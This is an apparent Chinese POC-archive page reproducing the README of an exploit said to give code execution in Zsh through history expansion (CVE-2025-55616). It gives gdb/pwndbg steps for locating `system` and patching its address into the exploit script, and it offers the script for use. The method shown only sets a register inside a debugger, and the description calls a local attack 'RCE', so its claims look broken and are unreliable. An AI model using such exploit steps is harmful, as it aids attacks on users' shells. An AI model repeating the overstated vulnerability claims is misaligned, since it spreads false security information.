POC详情: 6d0862065e7865cfdca34d17bb3d9b7f99d8405b

来源
关联漏洞

疑似Oday

介绍

# CVE-2025-55616
## Author: Rana M.Sinan Adil
- ## **Vulnerability Found in Zsh leading RCE through History Expression**


# Key Points
 To Run this exploit:  **just change the ip address and the "p system" in exploit**, because i also tried this in my second laptop, and to change it run this following command in gdb (especially in pwndbg ):
```bash
$ gdb zsh -f (in terminal)

pwndbg> run -f

username% ! (username will be your,s just write ! )

username% !!11111111111 (same here just write  !!11111111111 )

pwndbg> p system
```
 after getting "p system" address just change it in 
### the following line in exploit: 

```
b'set $rip =  0x7ffff7cc9110', (use your p system address in place of 0x7ffff7cc9110
```
## Description

 This vulnerability allows local attackers to achieve Arbitrary Code Execution (RCE) with the privileges of the user running the Zsh process.

## Usage
```
python3 CVE-2025-55616.py
```
文件快照

[4.0K] /data/pocs/6d0862065e7865cfdca34d17bb3d9b7f99d8405b ├── [3.4K] CVE-2025-55616.py ├── [ 81K] details.pdf └── [ 920] README.md 0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。